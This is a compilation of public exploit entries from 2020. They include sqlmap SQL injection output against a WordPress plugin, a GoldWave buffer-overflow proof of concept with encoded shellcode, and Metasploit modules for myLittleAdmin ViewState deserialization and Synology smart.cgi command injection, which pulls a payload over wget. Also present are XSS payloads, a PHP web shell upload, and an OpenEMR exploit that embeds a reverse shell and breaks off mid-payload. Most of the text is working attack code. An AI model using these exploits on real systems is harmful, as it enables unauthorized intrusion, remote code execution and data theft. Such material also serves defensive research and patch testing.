sqlmap -u ' http://test-wp.com:80/wordpress/wp-admin/admin.php?page=blocked_ips_fm&s=123' --cookie='wordpress_a1c6f59e10f34b6016913b2f9ff0346f=admin%7C1590313373%7CtioKZPEQ9lGWkoMcKGK2qjTp8kepuU9cqticECRXZ79%7C96d43f4ee5cf009365c9722f461d538f96a62637094759cb6fb7a9f54edac171;wordpress_test_cookie=WP+Cookie+check;wordpress_logged_in_a1c6f59e10f34b6016913b2f9ff0346f=admin%7C1590313373%7CtioKZPEQ9lGWkoMcKGK2qjTp8kepuU9cqticECRXZ79%7C9a63283d84855ed6eeae8e4b5f3a405fba003ddd15748bf5cdca5caaca228a19;wp-settings-1=libraryContent%3Dbrowse;wp-settings-time-1=1590140574;PHPSESSID=5bpdr8tbj5furvccoadjjj2sgb'

Parameter: s (GET)
Type: boolean-based
blind - WHERE or HAVING clause (MySQL comment) Payload: page=blocked_ips_fm&s=-1027" OR 8913=8913# Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: page=blocked_ips_fm&s=123" AND (SELECT 2867 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (ELT(2867=2867,1))),0x71787a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- TxQH Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: page=blocked_ips_fm&s=123" AND SLEEP(5)-- oPEC --- [17:20:17] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Apache 2.4.29 back-end DBMS: MySQL >= 5.0
-
GoldWave - Buffer Overflow (SEH Unicode)
# Exploit Title: GoldWave 5.70 – Buffer Overflow (SEH Unicode)
# Date: 2020-05-14
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.goldwave.com/
# Version: 5.70
# Download Link: http://goldwave.com//downloads/gwave570.exe
# Tested on: Windows 10 x86
# PoC
# 1. generate crash.txt, copy contents to clipboard
# 2. open gold wave app
# 3. select File, Open URL...
# 4. paste contents from clipboard after 'http://'
# 5. select OK
#
# Buffer layout (see the per-line comments below): 1019 bytes of filler,
# a 2-byte Unicode-safe NOP, the 2 bytes that land on the SEH handler
# (the comment documents them as 0x004800b3 pop/pop/ret), a short
# push/pop/add/sub sequence interleaved with single-byte Unicode NOPs that
# leaves EAX pointing into the NOP sled, 595 sled bytes, the msfvenom
# unicode_upper-encoded calc.exe payload (BufferRegister=EAX), then \x44
# padding up to a total of exactly 5000 bytes. The byte values are chosen
# to survive the application's ANSI->Unicode conversion, so every value
# and its position matters; do not reorder.
# NOTE(review): the "ADD EAX," / "SUB EAX," comments do not state the
# resulting EAX value; the sled offset is implied by the byte counts only.
f = open("crash.txt", "wb")
buf = b""
buf += b"\x41" * 1019
buf += b"\x71\x71" # Unicode NOP
buf += b"\xB3\x48" # 0x004800b3 | pop ecx, pop ebp, ret #realigning stack
buf += b"\x75" # Unicode NOP
buf += b"\x54" # Push ESP
buf += b"\x75" # Unicode NOP
buf += b"\x58" # POP EAX
buf += b"\x75" # Unicode NOP
buf += b"\x05\xFF\x10" # ADD EAX,
buf += b"\x75" # Unicode NOP
buf += b"\x2d\xEA\x10" # SUB EAX,
buf += b"\x75"
buf += b"\x71" * 595
# msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_upper BufferRegister=EAX -f python
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51"
buf += b"\x41\x54\x41\x58\x41\x5a\x41\x50\x55\x33\x51\x41\x44"
buf += b"\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41"
buf += b"\x51\x41\x49\x41\x51\x41\x50\x41\x35\x41\x41\x41\x50"
buf += b"\x41\x5a\x31\x41\x49\x31\x41\x49\x41\x49\x41\x4a\x31"
buf += b"\x31\x41\x49\x41\x49\x41\x58\x41\x35\x38\x41\x41\x50"
buf += b"\x41\x5a\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49"
buf += b"\x41\x49\x51\x49\x31\x31\x31\x31\x41\x49\x41\x4a\x51"
buf += b"\x49\x31\x41\x59\x41\x5a\x42\x41\x42\x41\x42\x41\x42"
buf += b"\x41\x42\x33\x30\x41\x50\x42\x39\x34\x34\x4a\x42\x4b"
buf += b"\x4c\x59\x58\x35\x32\x4b\x50\x4b\x50\x4d\x30\x31\x50"
buf += b"\x43\x59\x4b\x35\x50\x31\x39\x30\x42\x44\x54\x4b\x50"
buf += b"\x50\x30\x30\x54\x4b\x42\x32\x4c\x4c\x54\x4b\x31\x42"
buf += b"\x4c\x54\x54\x4b\x34\x32\x4f\x38\x4c\x4f\x48\x37\x50"
buf += b"\x4a\x4f\x36\x50\x31\x4b\x4f\x36\x4c\x4f\x4c\x31\x51"
buf += b"\x43\x4c\x4c\x42\x4e\x4c\x4f\x30\x39\x31\x38\x4f\x4c"
buf += b"\x4d\x4d\x31\x59\x37\x4a\x42\x4a\x52\x42\x32\x51\x47"
buf += b"\x34\x4b\x50\x52\x4c\x50\x34\x4b\x30\x4a\x4f\x4c\x54"
buf += b"\x4b\x30\x4c\x4e\x31\x34\x38\x4b\x33\x30\x48\x4b\x51"
buf += b"\x4a\x31\x30\x51\x54\x4b\x50\x59\x4d\x50\x4d\x31\x5a"
buf += b"\x33\x44\x4b\x31\x39\x4c\x58\x39\x53\x4e\x5a\x30\x49"
buf += b"\x44\x4b\x4e\x54\x34\x4b\x4d\x31\x4a\x36\x4e\x51\x4b"
buf += b"\x4f\x36\x4c\x59\x31\x38\x4f\x4c\x4d\x4b\x51\x49\x37"
buf += b"\x4e\x58\x4b\x30\x52\x55\x4b\x46\x4c\x43\x43\x4d\x4c"
buf += b"\x38\x4f\x4b\x43\x4d\x4e\x44\x42\x55\x5a\x44\x30\x58"
buf += b"\x54\x4b\x52\x38\x4e\x44\x4b\x51\x59\x43\x31\x56\x34"
buf += b"\x4b\x4c\x4c\x50\x4b\x34\x4b\x50\x58\x4d\x4c\x4b\x51"
buf += b"\x39\x43\x44\x4b\x4d\x34\x44\x4b\x4b\x51\x4a\x30\x35"
buf += b"\x39\x30\x44\x4d\x54\x4d\x54\x31\x4b\x51\x4b\x53\x31"
buf += b"\x50\x59\x50\x5a\x32\x31\x4b\x4f\x49\x50\x31\x4f\x31"
buf += b"\x4f\x31\x4a\x34\x4b\x4e\x32\x4a\x4b\x54\x4d\x51\x4d"
buf += b"\x51\x5a\x4b\x51\x54\x4d\x54\x45\x46\x52\x4b\x50\x4d"
buf += b"\x30\x4b\x50\x32\x30\x33\x38\x4e\x51\x34\x4b\x42\x4f"
buf += b"\x34\x47\x4b\x4f\x49\x45\x57\x4b\x5a\x50\x38\x35\x45"
buf += b"\x52\x52\x36\x42\x48\x37\x36\x34\x55\x47\x4d\x55\x4d"
buf += b"\x4b\x4f\x4a\x35\x4f\x4c\x4c\x46\x33\x4c\x4c\x4a\x43"
buf += b"\x50\x4b\x4b\x39\x50\x33\x45\x4d\x35\x47\x4b\x50\x47"
buf += b"\x4e\x33\x42\x52\x42\x4f\x31\x5a\x4b\x50\x50\x53\x4b"
buf += b"\x4f\x49\x45\x52\x43\x53\x31\x42\x4c\x53\x33\x4e\x4e"
buf += b"\x32\x45\x34\x38\x53\x35\x4b\x50\x41\x41"
# Pad to a fixed total of 5000 bytes; len(buf) is the byte count so far.
buf += b"\x44" * (5000 - len(buf))
f.write(buf)
f.close()
-
Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Root cause (per the module description): myLittleAdmin ships a hardcoded
# <machineKey> in web.config, so the ViewState MAC key is public and a
# client can produce a __VIEWSTATE the server will accept and deserialize.
# The two constants below are that generator value and validation key.
# The implied fix is an installation-specific <machineKey>.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  # Fallback __VIEWSTATEGENERATOR, used only when the page does not expose one.
  # <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
  VIEWSTATE_GENERATOR = 'CA0B0334'.freeze

  # The hardcoded validationKey from web.config as raw bytes (64 bytes, SHA1 MAC).
  # <machineKey
  # validationKey="5C7EEF6650639D2CB8FAA0DA36AF24452DCF69065F2EDC2C8F2F44C0220BE2E5889CA01A207FC5FCE62D1A5A4F6D2410722261E6A33E77E0628B17AA928039BF"
  # decryptionKey="DC47E74EA278F789D2FF0E412AD840A89C10171F408D8AC4"
  # validation="SHA1" />
  VIEWSTATE_VALIDATION_KEY = "\x5c\x7e\xef\x66\x50\x63\x9d\x2c\xb8\xfa\xa0\xda\x36\xaf\x24\x45\x2d\xcf" \
    "\x69\x06\x5f\x2e\xdc\x2c\x8f\x2f\x44\xc0\x22\x0b\xe2\xe5\x88\x9c\xa0\x1a" \
    "\x20\x7f\xc5\xfc\xe6\x2d\x1a\x5a\x4f\x6d\x24\x10\x72\x22\x61\xe6\xa3\x3e" \
    "\x77\xe0\x62\x8b\x17\xaa\x92\x80\x39\xbf".freeze

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::ViewState
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell

  # Module metadata, three targets (command, dropper, PowerShell stager) and
  # the two options: RPORT (8401, the Plesk default) and TARGETURI.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Plesk/myLittleAdmin ViewState .NET Deserialization',
        'Description' => %q{ This module exploits a ViewState .NET deserialization vulnerability in web-based MS SQL Server management tool myLittleAdmin, for version 3.8 and likely older versions, due to hardcoded <machineKey> parameters in the web.config file for ASP.NET. Popular web hosting control panel Plesk offers myLittleAdmin as an optional component that is selected automatically during "full" installation. This exploit caters to the Plesk target, though it should work fine against a standalone myLittleAdmin setup. Successful exploitation results in code execution as the user running myLittleAdmin, which is IUSRPLESK_sqladmin for Plesk and described as the "SQL Admin MSSQL anonymous account." Tested on the latest Plesk Obsidian with optional myLittleAdmin 3.8. 
},
        'Author' => [
          # Reported to SSD (SecuriTeam) by an anonymous researcher
          # Publicly disclosed by Noam Rathaus of SSD (SecuriTeam)
          'Spencer McIntyre', # Inspiration
          'wvu' # Module
        ],
        'References' => [
          ['CVE', '2020-13166'],
          ['URL', 'https://ssd-disclosure.com/ssd-advisory-mylittleadmin-preauth-rce/'],
          ['URL', 'https://portswigger.net/daily-swig/mylittleadmin-has-a-big-unpatched-security-flaw']
        ],
        'DisclosureDate' => '2020-05-15', # SSD (SecuriTeam) advisory
        'License' => MSF_LICENSE,
        'Platform' => 'win',
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
        'Privileged' => false,
        'Targets' => [
          [
            'Windows Command',
            'Arch' => ARCH_CMD,
            'Type' => :win_cmd,
            'DefaultOptions' => {
              'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
            }
          ],
          [
            'Windows Dropper',
            'Arch' => [ARCH_X86, ARCH_X64],
            'Type' => :win_dropper,
            'CmdStagerFlavor' => %i[psh_invokewebrequest certutil vbs],
            'DefaultOptions' => {
              'CMDSTAGER::FLAVOR' => :psh_invokewebrequest,
              'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
            }
          ],
          [
            'PowerShell Stager',
            'Arch' => [ARCH_X86, ARCH_X64],
            'Type' => :psh_stager,
            'DefaultOptions' => {
              'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
            }
          ]
        ],
        'DefaultTarget' => 2,
        'DefaultOptions' => {
          'SSL' => true,
          'WfsDelay' => 10 # First exploit attempt may be a little slow
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      Opt::RPORT(8401, true, 'The myLittleAdmin port (default for Plesk!)'),
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])

    # XXX: https://github.com/rapid7/metasploit-framework/issues/12963
    import_target_defaults
  end

  # Fingerprints the target: a GET to TARGETURI must return 200 with the
  # 'myLittleAdmin for SQL Server' banner, otherwise Unknown (not Safe, since
  # nothing about the product has been established). A recognised page is
  # handed to check_viewstate for the real test.
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path)
    )

    unless res
      return CheckCode::Unknown('Target did not respond to check request.')
    end

    unless res.code == 200 && res.body.include?('myLittleAdmin for SQL Server')
      return CheckCode::Unknown('Target is not running myLittleAdmin.')
    end

    vprint_good("myLittleAdmin is running at #{full_uri}")

    check_viewstate(res.get_html_document)
  end

  # Decides Vulnerable/Safe by checking whether the page's own __VIEWSTATE
  # validates under VIEWSTATE_VALIDATION_KEY (can_sign_viewstate? comes from
  # the ViewState mixin). Side effect: stores the packed __VIEWSTATEGENERATOR
  # in @viewstate_generator, which execute_command relies on later.
  #
  # @param html [Nokogiri document, as returned by res.get_html_document]
  # @return [CheckCode] Detected when no __VIEWSTATE is present, else
  #   Vulnerable or Safe
  def check_viewstate(html)
    viewstate = html.at('//input[@id = "__VIEWSTATE"]/@value')&.text

    unless viewstate
      return CheckCode::Detected("__VIEWSTATE not found, can't complete check.")
    end

    @viewstate_generator = html.at('//input[@id = "__VIEWSTATEGENERATOR"]/@value')&.text

    unless @viewstate_generator
      print_warning('__VIEWSTATEGENERATOR not found, using known default value')
      @viewstate_generator = VIEWSTATE_GENERATOR
    end

    # ViewState generator needs to be a packed integer now
    # (hex string -> 32-bit little-endian, the form the MAC computation expects)
    @viewstate_generator = [@viewstate_generator.to_i(16)].pack('V')

    we_can_sign_viewstate = can_sign_viewstate?(
      viewstate,
      extra: @viewstate_generator,
      key: VIEWSTATE_VALIDATION_KEY
    )

    if we_can_sign_viewstate
      return CheckCode::Vulnerable('We can sign our own ViewState.')
    end

    CheckCode::Safe("We can't sign our own ViewState.")
  end

  # Dispatches on the selected target type; every path ends in a single POST
  # carrying the signed __VIEWSTATE (see execute_command).
  def exploit
    # NOTE: Automatic check is implemented by the AutoCheck mixin
    # NOTE(review): @viewstate_generator is only populated by check_viewstate;
    # if the automatic check is skipped it would be nil here — confirm what the
    # mixin does in that case.
    super

    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")

    case target['Type']
    when :win_cmd
      execute_command(payload.encoded)
    when :win_dropper
      execute_cmdstager
    when :psh_stager
      execute_command(cmd_psh_payload(
        payload.encoded,
        payload.arch.first,
        remove_comspec: true
      ))
    end
  end

  # Sends one POST to TARGETURI whose only field is a __VIEWSTATE built by
  # generate_viewstate_payload (ViewState mixin) and signed with the leaked
  # key. Success is inferred from the server's reaction: a 302 to
  # /error/index.html; anything else raises PayloadFailed. For defenders,
  # that POST-then-302 pair against the application root is the
  # observable artefact (also flagged by the IOC_IN_LOGS note above).
  #
  # @param cmd [String] command to run on the target
  # @param _opts [Hash] unused; kept for the CmdStager interface
  def execute_command(cmd, _opts = {})
    vprint_status("Serializing command: #{cmd}")

    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path),
      'vars_post' => {
        # This is the only parameter we need for successful exploitation!
        '__VIEWSTATE' => generate_viewstate_payload(
          cmd,
          extra: @viewstate_generator,
          key: VIEWSTATE_VALIDATION_KEY
        )
      }
    )

    unless res && res.code == 302 && res.redirection.path == '/error/index.html'
      fail_with(Failure::PayloadFailed, "Could not execute command: #{cmd}")
    end

    print_good("Successfully executed command: #{cmd}")
  end

end
-
Victor CMS 1.0 - 'add_user' Persistent Cross-Site Scripting
# Exploit Title: Victor CMS 1.0 - 'add_user' Persistent Cross-Site Scripting
# Google Dork: N/A
# Date: 2020-05-23
# Exploit Author: Nitya Nand
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Version: 1.0
# Tested on: Linux
# CVE : N/A

Description:
The POST parameters 'user_name', 'user_firstname' and 'user_lastname' are vulnerable to persistent cross-site scripting.

Payload: <script>alert(1)</script>

POST /phpmaster/admin/users.php?source=add_user HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/phpmaster/admin/users.php?source=add_user
Content-Type: multipart/form-data; boundary=---------------------------515906178311115682892435428
Content-Length: 417375
Connection: close
Cookie: PHPSESSID=8810e038f92cd7c711ee8b95db1dcacb
Upgrade-Insecure-Requests: 1

-----------------------------515906178311115682892435428
Content-Disposition: form-data; name="user_name"

"><script>alert(1)</script>
-----------------------------515906178311115682892435428
Content-Disposition: form-data; name="user_firstname"

"><script>alert(2)</script>
-----------------------------515906178311115682892435428
Content-Disposition: form-data; name="user_lastname"

"><script>alert(3)</script>
-----------------------------515906178311115682892435428
Content-Disposition: form-data; name="user_image"; filename="9400.jpg"
Content-Type: image/jpeg

-----------------------------515906178311115682892435428
Content-Disposition: form-data; name="user_role"

User
-----------------------------515906178311115682892435428
Content-Disposition: form-data; name="user_email"

[email protected]
-----------------------------515906178311115682892435428
Content-Disposition: form-data; name="user_password"

1234
-----------------------------515906178311115682892435428 Content-Disposition: form-data; name="create_user" Add User -----------------------------515906178311115682892435428--
-
Online Discussion Forum Site 1.0 - Remote Code Execution
# Exploit Title: Online Discussion Forum Site 1.0 - Remote Code Execution
# Google Dork: N/A
# Date: 2020-05-24
# Exploit Author: Selim Enes 'Enesdex' Karaduman
# Vendor Homepage: https://www.sourcecodester.com/php/14233/online-discussion-forum-site.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14233&title=Online+Discussion+Forum+Site
# Version: 1.0 (REQUIRED)
# Tested on: Windows 10 / Wamp Server
# CVE : N/A

Go to the registration page http://localhost/Online%20Discussion%20Forum%20Site/register.php to sign up.
Then fill in the other fields and upload shell.php containing the following PHP shell code:

<?php $command = shell_exec($_REQUEST['cmd']); echo $command; ?>

After the registration process is completed, go to the following page and execute an OS command via the uploaded shell:

http://localhost/Online%20Discussion%20Forum%20Site/ups/shell.php?cmd=$THECODE-YOU-WANT-TO-EXECUTE

Any unauthenticated attacker is able to execute arbitrary OS commands.
-
Synology DiskStation Manager - smart.cgi Remote Command Execution (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Post-authentication command injection in DSM's smart.cgi: the 'disk'
# parameter is interpolated into a shell command, and backticks in it run
# as root (see inject_request). Because the injected string is length
# limited, the module stages a wget input file in /a a few characters at a
# time, fetches the payload from its own HTTP server into b, and runs it
# from the server callback (on_request_uri).
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::FileDropper

  # Parses webman/info.cgi output; captures major, minor, build (digits only)
  # and the model suffix. The junior field is matched but not captured.
  # Written with the /x flag, so the embedded whitespace is ignored.
  DEVICE_INFO_PATTERN = /major=(?<major>\d+)&minor=(?<minor>\d+)&build=(?<build>\d+) &junior=\d+&unique=synology_\w+_(?<model>[^&]+)/x.freeze

  # Module metadata plus the options: RPORT (5000), TARGETURI, USERNAME
  # (defaults to 'admin'), PASSWORD (defaults to empty) and the advanced
  # ForceExploit switch that bypasses the check result in exploit.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Synology DiskStation Manager smart.cgi Remote Command Execution',
        'Description' => %q{ This module exploits a vulnerability found in Synology DiskStation Manager (DSM) versions < 5.2-5967-5, which allows the execution of arbitrary commands under root privileges after website authentication. The vulnerability is located in webman/modules/StorageManager/smart.cgi, which allows appending of a command to the device to be scanned. However, the command with drive is limited to 30 characters. A somewhat valid drive name is required, thus /dev/sd is used, even though it doesn't exist. To circumvent the character restriction, a wget input file is staged in /a, and executed to download our payload to /b. From there the payload is executed. A wfsdelay is required to give time for the payload to download, and the execution of it to run. 
},
        'Author' => [
          'Nigusu Kassahun', # Discovery
          'h00die' # metasploit module
        ],
        'References' => [
          [ 'CVE', '2017-15889' ],
          [ 'EDB', '43190' ],
          [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-synology-storagemanager-smart-cgi-remote-command-execution/' ],
          [ 'URL', 'https://synology.com/en-global/security/advisory/Synology_SA_17_65_DSM' ]
        ],
        'Privileged' => true,
        'Stance' => Msf::Exploit::Stance::Aggressive,
        'Platform' => ['python'],
        'Arch' => [ARCH_PYTHON],
        'Targets' => [
          ['Automatic', {}]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'PrependMigrate' => true,
          'WfsDelay' => 10
        },
        'License' => MSF_LICENSE,
        'DisclosureDate' => 'Nov 08 2017'
      )
    )

    register_options(
      [
        Opt::RPORT(5000),
        OptString.new('TARGETURI', [true, 'The URI of the Synology Website', '/']),
        OptString.new('USERNAME', [true, 'The Username for Synology', 'admin']),
        OptString.new('PASSWORD', [true, 'The Password for Synology', ''])
      ]
    )

    register_advanced_options [
      OptBool.new('ForceExploit', [false, 'Override check result', false])
    ]
  end

  # Version check via the unauthenticated webman/info.cgi endpoint.
  # Returns Unknown when the page is missing or does not match
  # DEVICE_INFO_PATTERN, Appears for 3.0-5.1 and for 5.2 builds that sort
  # before '5967-5', Safe otherwise.
  #
  # NOTE(review): `build` holds digits only, so `build < '5967-5'` is a
  # plain String comparison: '5967' is a prefix of '5967-5' and therefore
  # "less", so build 5967 is reported Appears regardless of the junior
  # (presumably the '-N' hotfix) value, which is not captured; and a build
  # with more digits such as '10000' sorts below '5967-5' as well.
  # A numeric comparison that also inspects junior would be more precise.
  def check
    vprint_status('Trying to detect installed version')
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'webman', 'info.cgi'),
      'vars_get' => { 'host' => '' }
    })

    if res && (res.code == 200) && res.body =~ DEVICE_INFO_PATTERN
      version = "#{$LAST_MATCH_INFO[:major]}.#{$LAST_MATCH_INFO[:minor]}"
      build = $LAST_MATCH_INFO[:build]
      # A leading run of lowercase letters collapses to its first letter, uppercased.
      model = $LAST_MATCH_INFO[:model].sub(/^[a-z]+/) { |s| s[0].upcase }
      model = "DS#{model}" unless model =~ /^[A-Z]/
    else
      vprint_error('Detection failed')
      return CheckCode::Unknown
    end

    vprint_status("Model #{model} with version #{version}-#{build} detected")

    case version
    when '3.0', '4.0', '4.1', '4.2', '4.3', '5.0', '5.1'
      return CheckCode::Appears
    when '5.2'
      return CheckCode::Appears if build < '5967-5'
    end

    CheckCode::Safe
  end

  # HttpServer callback: serves the encoded payload to the target's wget,
  # then triggers a final injection that runs it with `python b`.
  # `cookie` and `token` are the session values captured by login.
  def on_request_uri(cli, _request, cookie, token)
    print_good('HTTP Server request received, sending payload')
    send_response(cli, payload.encoded)
    print_status('Executing payload')
    inject_request(cookie, token, 'python b')
  end

  # The injection primitive: POSTs to smart.cgi with the authenticated
  # cookie and X-SYNO-TOKEN header, placing `cmd` in backticks after the
  # non-existent device /dev/sd. The description notes a 30-character limit
  # on the whole 'disk' value, hence the short commands used by exploit.
  def inject_request(cookie, token, cmd = '')
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'webman', 'modules', 'StorageManager', 'smart.cgi'),
      'cookie' => cookie,
      'headers' => { 'X-SYNO-TOKEN' => token },
      'vars_post' => {
        'action' => 'apply',
        'operation' => 'quick',
        'disk' => "/dev/sd`#{cmd}`"
      }
    })
  end

  # Logs in with USERNAME/PASSWORD using the plain (non-RSA) form and returns
  # [cookies, SynoToken] on success; BadConfig on a rejected login, Unknown
  # on an unexpected JSON result.
  #
  # NOTE(review): when the response is missing or carries no
  # <div id='synology'> block the method falls through and returns nil, so
  # the caller's `cookie, token = login` silently gets nil/nil.
  def login
    # If you try to debug login through the browser, you'll see that desktop.js calls
    # ux-all.js to do an RSA encrypted login.
    # However in a stroke of luck Mrs. h00die caused
    # a power sag while tracing/debugging the login, causing the NAS to power off.
    # when that happened, it failed to get the crypto vars, and defaulted to a
    # non-encrypted login, which seems to work just fine. greetz Mrs. h00die!
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'webman', 'login.cgi'),
      'vars_get' => { 'enable_syno_token' => 'yes' },
      'vars_post' => {
        'username' => datastore['USERNAME'],
        'passwd' => datastore['PASSWORD'],
        'OTPcode' => '',
        '__cIpHeRtExT' => '',
        'client_time' => Time.now.to_i,
        'isIframeLogin' => 'yes'
      }
    })

    # Regex-literal =~ with a named capture binds the local `json`.
    if res && %r{<div id='synology'>(?<json>.*)</div>}m =~ res.body
      result = JSON.parse(json)
      fail_with(Failure::BadConfig, 'Incorrect Username/Password') if result['result'] == 'error'
      if result['result'] == 'success'
        return res.get_cookies, result['SynoToken']
      end
      fail_with(Failure::Unknown, "Unknown response: #{result}")
    end
  end

  # Orchestration: check (unless ForceExploit), require a routable SRVHOST,
  # log in, start the payload server, clear any previous /a and b, write
  # "SRVHOST:SRVPORT" into /a in slices of 7 characters (22 minus the 14
  # characters of "echo -n ''>>/a", minus one), then ask wget to read the
  # URL list from /a into b. The server callback performs the last step.
  # Both staged files are registered for cleanup; the path of b assumes
  # smart.cgi's working directory is its own module directory (presumably).
  def exploit
    unless check == CheckCode::Appears
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    # The target must be able to reach us back; a wildcard bind address is unusable.
    if datastore['SRVHOST'] == '0.0.0.0'
      fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful')
    end

    begin
      print_status('Attempting Login')
      cookie, token = login
      start_service({
        'Uri' => {
          'Proc' => proc do |cli, req|
            on_request_uri(cli, req, cookie, token)
          end,
          'Path' => '/'
        }
      })

      print_status('Cleaning env')
      # NOTE(review): `cmd = ...` inside the argument list is only an
      # assignment expression; the value is passed positionally and the
      # local `cmd` is never read.
      inject_request(cookie, token, cmd = 'rm -rf /a')
      inject_request(cookie, token, cmd = 'rm -rf b')

      command = "#{datastore['SRVHOST']}:#{datastore['SRVPORT']}".split(//)
      command_space = 22 - "echo -n ''>>/a".length
      command_space -= 1
      command.each_slice(command_space) do |a|
        a = a.join('')
        vprint_status("Staging wget with: echo -n '#{a}'>>/a")
        inject_request(cookie, token, cmd = "echo -n '#{a}'>>/a")
      end

      print_status('Requesting payload pull')
      register_file_for_cleanup('/usr/syno/synoman/webman/modules/StorageManager/b')
      register_file_for_cleanup('/a')
      inject_request(cookie, token, cmd = 'wget -i /a -O b')
      # at this point we let the HTTP server call the last stage
      # wfsdelay should be long enough to hold out for everything to download and run
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
    end
  end
end
-
Open-AudIT 3.3.0 - Reflective Cross-Site Scripting (Authenticated)
# Exploit Title: Open-AudIT 3.3.0 - Reflective Cross-Site Scripting (Authenticated) # Date: 2020-04-26 # Exploit Author: Kamaljeet Kumar # Vendor Homepage: https://opmantek.com/network-discovery-inventory-software/ # Software Link: https://www.open-audit.org/downloads.php # Version: 3.3.0 # CVE : CVE-2020-12261 # POC: Step 1: Log in to Open-AudIT. Step 2: Go to "http://192.168.0.4/open-audit/index.php/search/" and append the payload "<svg><animate onend=alert(1) attributeName=x dur=1s>" after the search path, so that the URL looks like: http://192.168.0.4/open-audit/index.php/search/<svg><animate onend=alert(1) attributeName=x dur=1s> The XSS pop-up then appears, showing that the search term is reflected into the page without encoding.
-
OpenEMR 5.0.1 - Remote Code Execution (1)
# Title: OpenEMR 5.0.1 - Remote Code Execution (1) # Exploit Author: Musyoka Ian # Date: 2020-05-25 # Title: OpenEMR < 5.0.1 - Remote Code Execution # Vendor Homepage: https://www.open-emr.org/ # Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz # Dockerfile: https://github.com/haccer/exploits/blob/master/OpenEMR-RCE/Dockerfile # Version: < 5.0.1 (Patch 4) # Tested on: Ubuntu LAMP, OpenEMR Version 5.0.1.3 # References: https://medium.com/@musyokaian/openemr-version-5-0-1-remote-code-execution-vulnerability-2f8fd8644a69 # openemr_exploit.py #!/usr/bin/env python2 # -*- coding: utf-8 -*- import requests import time auth = "[+] Authentication with credentials provided please be patient" upload = "[+] Uploading a payload it will take a minute" netcat = "[+] You should be getting a shell" s = requests.Session() payload = {'site': 'default', 'mode' : 'save', 'docid' : 'shell.php', 'content' : """<?php set_time_limit (0); $VERSION = "1.0"; $ip = '127.0.0.1'; # CHANGE THIS $port = 9001; # CHANGE THIS $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0; // // Daemonise ourself if possible to avoid zombies later // // pcntl_fork is hardly ever available, but will allow us to daemonise // our php process and avoid zombies. Worth a try... if (function_exists('pcntl_fork')) { // Fork and have the parent process exit $pid = pcntl_fork(); if ($pid == -1) { printit("ERROR: Can't fork"); exit(1); } if ($pid) { exit(0); // Parent exits } // Make the current process a session leader // Will only succeed if we forked if (posix_setsid() == -1) { printit("Error: Can't setsid()"); exit(1); } $daemon = 1; } else { printit("WARNING: Failed to daemonise. This is quite common and not fatal."); } // Change to a safe directory chdir("/"); // Remove any umask we inherited umask(0); // // Do the reverse shell... 
